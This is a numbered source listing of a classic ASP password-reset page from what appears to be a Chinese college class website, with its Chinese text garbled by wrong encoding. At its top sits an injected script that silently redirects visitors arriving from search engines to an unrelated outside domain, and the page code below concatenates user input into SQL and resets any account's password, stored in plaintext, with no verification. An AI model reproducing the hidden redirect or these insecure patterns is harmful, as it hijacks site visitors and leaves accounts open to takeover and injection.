d:\wwwroot\wuchunhua\ͨѶ¼\wjmm\wjmm4.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!-- #include file="conn.asp" -->
002:
<%
003:
name=Trim(Request("name"))
004:
pwd1=Trim(Request("pwd1"))
005:
pwd2=Trim(Request("pwd2"))
006:
if pwd1<>pwd2 then
007:
Response.Redirect "../error.asp?id=ÄúÁ½´ÎÊäÈëµÄÃÜÂë²»Ò»Ö£¬ÇëÖØÐÂÊäÈ룡"
008:
end if
009:
010:
011:
set rs=server.createobject("adodb.recordset")
012:
sql="select * from [user] where name='" + name + "'"
013:
rs.open sql,conn,3,3
014:
rs("pwd")=pwd1
015:
rs.Update
016:
rs.close
017:
Set rs=nothing
018:
%
>
019:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
020:
"http://www.w3.org/TR/html4/loose.dtd">
021:
<html>
022:
<head>
023:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
024:
<link href="../css.css" rel="stylesheet" type="text/css">
025:
<title>ÆëÆë¹þ¶ûְҵѧԺ ¼ÆÈí052--ÕÒ»ØÃÜÂë</title>
026:
<style type="text/css">
027:
<!--
028:
body {
029:
background-image: url('../pic/xian.jpg');
030:
}
031:
.ziti {
032:
font-family: "ËÎÌå";
033:
font-size: 12px;
034:
font-weight: normal;
035:
color: #000000;
036:
}
037:
.ziti1 {
038:
font-size: 12px;
039:
font-weight: normal;
040:
color: #FF0000;
041:
}
042:
.style2 {
043:
font-size: 1pt;
044:
color: #FFFFFF;
045:
}
046:
.ziti2 { font-family: "ËÎÌå";
047:
font-size: 12px;
048:
font-weight: bold;
049:
color: #FFFFFF;
050:
}
051:
.tishi { font-family: "ËÎÌå";
052:
font-size: 12px;
053:
color: #FF0000;
054:
}
055:
.ziti3 { font-family: "ËÎÌå";
056:
font-size: 12px;
057:
color: #000000;
058:
}
059:
.ziti11 { font-size: 12px;
060:
font-weight: normal;
061:
color: #000000;
062:
}
063:
-->
064:
</style></head>
065:
<body>
066:
<table width="775" border="0" align="center" cellpadding="0" cellspacing="0">
067:
<tr>
068:
<th scope="col"><img src="../pic/toplogo.jpg" width="775" height="80"></th>
069:
</tr>
070:
<tr>
071:
<td height="2"><span class="style2">1</span></td>
072:
</tr>
073:
<tr>
074:
<td height="20" background="../pic/tiao1.gif"><table width="775" border="0" cellpadding="0" cellspacing="0">
075:
<tr class="ziti2">
076:
<th width="97" scope="col">Ê×Ò³</th>
077:
<th width="97" scope="col">Ïà²á</th>
078:
<th width="97" scope="col">ÁôÑÔ±¾</th>
079:
<th width="97" scope="col">ÐíÔ¸°å</th>
080:
<th width="97" scope="col">ÇÄÇÄ»°</th>
081:
<th width="97" scope="col"><a href="#" name="link1" id="link1" onMouseOver="MM_showMenu(window.mm_menu_1122195914_0,0,12,null,'link1')" onMouseOut="MM_startTimeout();">×ÊÁÏÏ»</a></th>
082:
<th width="97" scope="col">¹ÜÀí</th>
083:
<th width="97" scope="col">怫</th>
084:
</tr>
085:
</table></td>
086:
</tr>
087:
<tr>
088:
<td height="53">
089:
<form action="wjmm4.asp" method="post">
090:
<p align="center"><br>
091:
ÃÜÂëÉèÖóɹ¦£¡</p>
092:
<p align="center"><font color="#000000"><a href="../denglu/denglu.asp">
093:
<font color="#000000">µ¥»÷ÕâÀïµÇ½</font></a></font></p>
094:
095:
096:
<td class="ziti11"></td>
097:
</tr>
098:
</table>
099:
<table width="775" border="0" align="center" cellpadding="0" cellspacing="0">
100:
<tr>
101:
<th scope="col"><hr>
102:
<span class="ziti11">°æÈ¨ËùÓÐ © ÆëÆë¹þ¶ûְҵѧԺ¼ÆËã»úÈí¼þ052°à</span></th>
103:
</tr>
104:
</table>
105:
<p>¡¡</p>
106:
</body>
107:
</html>
108:
109: